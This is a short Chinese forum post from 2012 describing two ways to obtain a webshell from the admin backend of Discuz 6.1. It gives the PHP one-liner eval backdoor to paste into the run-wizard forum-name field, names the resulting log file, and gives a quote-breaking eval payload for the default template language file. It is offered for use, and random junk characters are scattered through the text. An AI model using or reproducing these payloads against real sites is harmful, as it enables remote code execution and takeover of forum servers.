discuz6.1两种方法后台拿shell
7 ` s( W& l# [; |) R- B2 d好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下( X/ T) y- R% z p1 S8 D
1:5 i w0 W- _ i+ e$ M6 k
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
$ i; K% n3 y# ~6 D6 W7 L" n8 y2 ^4 ^admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
) i$ c/ B0 V/ `+ w$ Z<?php eval($_POST[cmd]);?>7 ?$ ?8 f0 ^0 ~/ P( s( e; G* k* d
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php9 N9 g6 U S0 z
0 C* J- v! }& O a
* g9 g: r' ^4 Z! r+ l
2:后台模板管理--默认模板套系--详情
^- k& \7 W4 D' {templates/default/actions.lang.php$ X; \1 P0 Y0 x$ C+ [1 K# T, P
jhackj\\');eval($_POST[cmd])?>;//
' U* ]3 p" e! W4 I+ E' C4 @' c! L6 ^* [6 ^! w, }( |; E0 k
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对